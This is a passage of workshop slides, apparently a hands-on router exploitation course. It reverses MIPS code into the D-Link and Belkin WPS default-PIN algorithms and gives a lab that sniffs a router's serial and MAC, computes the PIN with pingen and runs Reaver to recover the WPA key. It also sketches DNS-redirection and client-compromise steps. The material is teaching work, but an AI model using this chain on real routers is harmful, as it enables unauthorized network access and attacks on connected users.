  • 96.  Answer: MAC address  Unique across all networking devices  12 bytes  Often used in combination with other values to seed various algorithms Hunt for the pin generation algorithm c. Figure out what type of data could “%c%c:..:%c%c” represent char buffer [….]; char * data =lockAndGetInfo_log->interesting_data_element …………………………………… sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
  • 97. 4) Reverse algorithm segment into C code (Next Slide) Extraction and Analysis (Steps)
  • 98.  As we will see, reversing assembly into C can be a tedious and arduous process  We will reverse the following code segment: Reverse algorithm segment into C code a. Reversing an example snippet of code
  • 99.  Instruction ‘li’: Loads a constant value into a register Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly Psuedo-C code v0 = 0x38E38E39  MIPS Instruction ‘li’:  Loads a constant value into a register  Value will be used for future arithmetic operation
  • 100.  Instruction ‘li’: Loads a constant value into a register Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly Psuedo-C code v0 = 0x38E38E39 [hi,lo] = v0*a3  MIPS Instruction ‘multiu’:  Multiply two 32-bit values (e.g. a3 & v0)  Registers `hi’ & ‘lo’ store the resulting 64-bit product hi (upper 32-bits) lo (lower 32-bits) 64-bit product
  • 101.  Instruction ‘li’: Loads a constant value into a register Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly Psuedo-C code v0 = 0x38E38E39 [hi,lo] = v0*a3 v0 = (v0*a3)>>32; right shift 32  MIPS Instruction ‘mfhi’:  Move value in ‘hi’ register to specified register (e.g. v0)  This is equivalent to right shifting the 64-bit product of v0 & a3 by 32-bits
  • 102.  Instruction ‘li’: Loads a constant value into a register Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly Psuedo-C code v0 = 0x38E38E39 [hi,lo] = v0*a3 v0 = (v0*a3)>>32; right shift 32 v0 = v0 >> 1; = ((a3 * 0x38E38E39) >>32) >> 1  MIPS Instruction ‘srl’:  Shift right logical  Logical means that the bit that replaces the most upper bits as the shift occurs is the value ‘0’  Lower bits that get shifted out are discarded
  • 103.  Observations  The net result of the assembly instructions is a complex looking expression  It turns out that this can be simplified quite a bit Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1
  • 104.  Observations  Logical shifts have an associative property  e.g. (v1>> 32) >> 1 == v1 >> 33 Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1 = (a3 * 0x38E38E39) >> 33
  • 105.  Observations  Right shifting a number by 1 has the effect of dividing that number by 2.  Therefore right shifting a number by 33 has the effect of dividing that number by 2^33 = 8589934592 Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1 = (a3 * 0x38E38E39) >> 33 = (a3 * 0x38E38E39)/8589934592
  • 106.  Observations  (954437177)10 = 0x38E38E39 Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1 = (a3 * 0x38E38E39) >> 33 = (a3 * 0x38E38E39)/8589934592 = (a3)(954437177/8589934592)
  • 107.  Observations  1/9 ~=(954437177)/8589934592 Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1 = (a3 * 0x38E38E39) >> 33 = (a3 * 0x38E38E39)/8589934592 = (a3)(954437177/8589934592) = (a3)(1/9)
  • 108.  Observations  As the above example illustrates, the disassembly performs operations such as shifts to do multiplication and division  What looks complex may be able to be decompiled into something much simpler Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code v0 = ($a3)/9 Disassembly C code
  • 109.  Luckily someone else (Craig) did all the grunt work in decompiling the disassembly for us  But we’ve seen how the general process for reversing works, so in theory we could do it   On the next slides, we’ll show the complete C implementation of the get_default_pin algoritm Reverse algorithm segment into C code b. Reversing the entire algorithm
  • 110.  dd /* * The largest possible remainder for any value divided by 10,000,000 * is 9,999,999 (7 digits). The smallest possible remainder is, * obviously, 0. */ pin = pin % 10000000; /* The pin needs to be at least 7 digits long */ if(pin < 1000000) { /* * The largest possible remainder for any value divided by 9 is * 8; hence this adds at most 9,000,000 to the pin value, and at * least 1,000,000. This guarantees that the pin will be 7 digits * long, and also means that it won't start with a 0. */ pin += ((pin % 9) * 1000000) + 1000000; } /* * The final 8 digit pin is the 7 digit value just computed, plus a * checksum digit. Note that in the disassembly, the wps_pin_checksum * function is inlined (it's just the standard WPS checksum implementation). */ pin = ((pin * 10) + wps_pin_checksum(pin)); sprintf(buf, "%08d", pin); return pin; } get_default_pin (Dlink router) unsigned int generate_default_pin(char *buf) { char *mac; char mac_address[32] = { 0 }; unsigned int oui, nic, pin; /* Get a pointer to the WAN MAC address */ mac = lockAndGetInfo_log()->wan_mac_address; /* * Create a local, NULL-terminated copy of the WAN MAC (simplified from * the original code's sprintf/memmove loop). */ sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0], mac[1], mac[2], …… mac[11] sscanf(mac_address, "%06X%06X", &oui, &nic); /* Do some XOR munging of the NIC. */ pin = (nic ^ 0x55AA55); pin = pin ^ (((pin & 0x0F) << 4) + ((pin & 0x0F) << 8) + ((pin & 0x0F) << 12) + ((pin & 0x0F) << 16) + ((pin & 0x0F) << 20));
  • 111.  We could follow a similar process to reverse the Belkin Pin algorithm  Yet again, Craig has spared us the trouble  On the next slide is the reversed C implementation of the Belkin algorithm Reverse algorithm segment into C code c. Reversing the Belkin Pin Generation Algorithm
  • 112. k1 = (sn[SN_DIGIT_2] + sn[SN_DIGIT_3] + nic[NIC_NIBBLE_0] + nic[NIC_NIBBLE_1]) % 16; k2 = (sn[SN_DIGIT_0] + sn[SN_DIGIT_1] + nic[NIC_NIBBLE_3] + nic[NIC_NIBBLE_2]) % 16; pin = k1 ^ sn[SN_DIGIT_1]; t1 = k1 ^ sn[SN_DIGIT_0]; t2 = k2 ^ nic[NIC_NIBBLE_1]; p1 = nic[NIC_NIBBLE_0] ^ sn[SN_DIGIT_1] ^ t1; p2 = k2 ^ nic[NIC_NIBBLE_0] ^ t2; p3 = k1 ^ sn[SN_DIGIT_2] ^ k2 ^ nic[NIC_NIBBLE_2]; k1 = k1 ^ k2; pin = (pin ^ k1) * 16; pin = (pin + t1) * 16; pin = (pin + p1) * 16; pin = (pin + t2) * 16; pin = (pin + p2) * 16; pin = (pin + k1) * 16; pin += p3; pin = (pin % 10000000) - (((pin % 10000000) / 10000000) * k1) return (pin * 10) + wps_checksum(pin); } get_default_pin (Belkin router) /* Munges the MAC and serial numbers to create a WPS pin */ int pingen(char *mac, char *serial) { #define NIC_NIBBLE_0 0 #define NIC_NIBBLE_1 1 #define NIC_NIBBLE_2 2 #define NIC_NIBBLE_3 3 #define SN_DIGIT_0 0 #define SN_DIGIT_1 1 #define SN_DIGIT_2 2 #define SN_DIGIT_3 3 int sn[4], nic[4], mac_len, serial_len; int k1, k2, pin p1, p2, p3 t1, t2; mac_len = strlen(mac); serial_len = strlen(serial); /* Get the four least significant digits of the serial number */ sn[SN_DIGIT_0] = char2int(serial[serial_len-1]); sn[SN_DIGIT_1] = char2int(serial[serial_len-2]); sn[SN_DIGIT_2] = char2int(serial[serial_len-3]); sn[SN_DIGIT_3] = char2int(serial[serial_len-4]); /* Get the four least significant nibbles of the MAC address */ nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]); nic[NIC_NIBBLE_1] = char2int(mac[mac_len-2]); nic[NIC_NIBBLE_2] = char2int(mac[mac_len-3]); nic[NIC_NIBBLE_3] = char2int(mac[mac_len-4]);
  • 113. Lab 2: Q&A  Why are weaknesses in implementation of a security design not discovered before product released?  Companies care more about time-to-market  Subscribe to the notion of security through obscurity  How long does the reverse engineering process take?  Depends on the device and the skills of the personnel  Charlie and Chris (Chrysler Jeep hack) said it took them over 3.5 months and they are pretty experienced
  • 114. Lab 2: Q&A  Is the reverse process always this tedious?  In general…yes, if not more so.  What things can make reversing harder?  Stripped binaries (e.g. no symbols)  Anti-debugging techniques  Code obfuscation  Writing original code in C++  What is an ELF (Executable and Linkable Format)?  Standard file format on Unix-like systems
  • 115. Lab 2: Q&A  Why is MIPS still popular in embedded devices?  Licensing costs for MIPS is cheaper than ARM  Why couldn’t we decompile using IDA Pro?  IDA only supportsARM and x86/64  No reliable decompilers for MIPS in general.
  • 116.  Additional Resources  Reversing D-Link’sWPS Pin Algorithm: http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/ Lab 2: Reversing with IDA Pro
  • 117. I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver Session I: Outline
  • 118. Lab 3: Obtaining initial access Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 3
  • 119.  Description  In this lab, we will explore how to use our knowledge of the pin generation algorithm to derive the WPA Key  Specifically, we will first need to acquire relevant input information into the algorithm by using Wireshark, and then run the algorithm to compute the WPS PIN  Then we’ll need to use Reaver to derive the WPA key from the WPS PIN Lab 3: Obtaining initial access
  • 120.  Steps forObtaining initial access 1. Acquire serial and wlan mac w/ Wireshark 2. Compile & execute wps pin generation algorithm 3. Run Reaver to obtain theWPA key 4. Connect to the router utilizing obtained WPA key Lab 3: Obtaining initial access
  • 121. 1) Acquire Serial and WLAN MAC with Wireshark (Next Slides) Lab 3: Obtaining initial access
  • 122.  We’ll need a wifi adapter that supports monitor mode  Monitor mode enables monitoring of all traffic received  Normally, the wifi adapter will filter out traffic not destined for it  An example wifi adapter that supports monitor mode is theTP-LINKTL-WN722N (pictured above); cost about $12 Acquiring serial and wlan information a. Attach Wifi adapter (monitor mode support) to PC
  • 123. b. Connect wifi adapter to guest Kali-Linux VM Acquiring serial and wlan information Click this
  • 124. b. Connect wifi adapter to guest Kali-Linux VM Acquiring serial and wlan information ClickThis
  • 125. c. Get the name of the wireless interface (e.g. wlanx),were x is 0-9 Acquiring serial and wlan information $ sudo iwconfig Wireless Interface Name
  • 126. d. Bring the wireless interface down so we can configure it Acquiring serial and wlan information $ sudo ifconfig wlanx down
  • 127. e. Change the wifi mode to monitor Acquiring serial and wlan information $ sudo iwconfig wlan0 mode monitor
  • 128. f. Set the channel of wireless interface to channel y, where y in 1-12 Acquiring serial and wlan information $ sudo iwconfig wlan0 channel %y%
  • 129. g. Bring the wireless interface back up Acquiring serial and wlan information $ sudo ifconfig wlan0 up
  • 130. h. Launch Wireshark Acquiring serial and wlan information $ sudo wireshark
  • 131. h. Click on wireless interface wlanx Acquiring serial and wlan information Click this
  • 132. i. Click Start Acquiring serial and wlan information Click this
  • 133. i. Click Start Acquiring serial and wlan information
  • 134. i. (Continued) Acquiring serial and wlan information
  • 135. j.Wait approximately 1-3 minute(s) as Wireshark captures packets Acquiring serial and wlan information
  • 136. k. Stop the capture Acquiring serial and wlan information Click to stop Capture
  • 137. l. Find a probe response message from Belkin_xx:xx:xx and click on it Acquiring serial and wlan information
  • 138. m. Click on “IEEE 802.11 wireless LAN management” to expand the selection Acquiring serial and wlan information Click to expand
  • 139. n. (After click) Acquiring serial and wlan information
  • 140. o. Click on “Tagged parameters” to expand the selection Acquiring serial and wlan information After Click
  • 141. p. Click on “Vendor Specific” to expand the selection Acquiring serial and wlan information After Click
  • 142. q. Locate and record the Serial Number Acquiring serial and wlan information Serial Number
  • 143. r. Locate and Record wlan MAC address of the Belkin router Acquiring serial and wlan information MAC Address
  • 144. 2. Compile & execute wps pin generation algorithm (Next Slides) Lab 3: Obtaining initial access
  • 145. a. Download pingen algorithm source from here and save to home dir Compile & Execute WPS pingen Algorithm
  • 146. b. Compile pingen.c Compile & Execute WPS pingen Algorithm $ sudo gcc -Wall pingen.c -o pingen
  • 147. c. Executing the pingen binary to see usage Compile & Execute WPS pingen Algorithm $ ./pingen
  • 148. d. Pass in appropriate parameters and execute pingen to get pin Compile & Execute WPS pingen Algorithm $ ./pingen xxxx xxxx Default Pin
  • 149. e.The Results Compile & Execute WPS pingen Algorithm The Pin
  • 150. Default Pin e.The Results Compile & Execute WPS pingen Algorithm The Pin
  • 151. 3. Run Reaver to obtainWPA Key (Next Slides) Lab 3: Obtaining initial access
  • 152. a. Executing Reaver with appropriate arguments Run Reaver to Obtain WPA Key reaver -i (monitor interface) -b (BSSID) -c (channel) - --pin=(8 digit pin) –T 5 -vv
  • 153. b.Wait for the Results (can take up to 30 seconds) Run Reaver to Obtain WPA Key WPA KEY
  • 154. 4. Connect to the router by utilizing the obtainedWPA key (Next Slides) Lab 3: Obtaining initial access
  • 155. a. Bring the wireless interface down so we can configure it Connect to router with WPA key $ sudo ifconfig wlanx down
  • 156. b. Change the wifi mode to managed Connect to router with WPA key $ sudo iwconfig wlan0 mode managed
  • 157. c. Bring the wireless interface back up Connect to router with WPA key $ sudo ifconfig wlan0 up
  • 158. c.Wait about a minute or so for the interface to be brought up Connect to router with WPA key
  • 159. d.Click the networking icon Connect to router with WPA key Click this icon
  • 160. e. Select the Appropriate Access Point Connect to router with WPA key Click on the appropriateAP
  • 161. f. Enter the WPA key and connect Connect to router with WPA key EnterWPA Key
  • 162. g.Wait while connection occurs Connect to router with WPA key Connecting…
  • 163. h. Connection is established Connect to router with WPA key Success!!
  • 164. h. Connect to web management server (Obtained Initial Access!!) Connect to router with WPA key
  • 165. i. Log into web management interface (Preview of next session) Connect to router with WPA key We’ll figure out how to gain admin access in Session II
  • 166. Lab 3: Q&A  What’s the difference between monitor mode and promiscuous mode?  Promiscuous mode allows packets to be sniffed only on the AP the wifi adapter is currently connected to  Monitor mode allows all packets on a particular channel to be sniffed if packets are in listening range  Are there any other interesting wifi modes?  Master mode, which allows the wifi adapter to behave as an access point  TheTP Link adapter also supports this mode 
  • 168. Recap Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password
  • 169. Recap Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 1
  • 170. Recap Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 2
  • 171. Recap Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 3
  • 172.  Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 174 Recap Pwned Session I
  • 173. Conclusion  In this session, we were able to obtain initial remote access to the target device  The next step is to elevate our privileges on the target to that of an adminsitrator.  This device uses client side authentication for admin privileges, which we will exploit in Session II  Session III will be focused on utilizing admin privileges from Session II to compromise aWindows 7 device connected to the Belkin router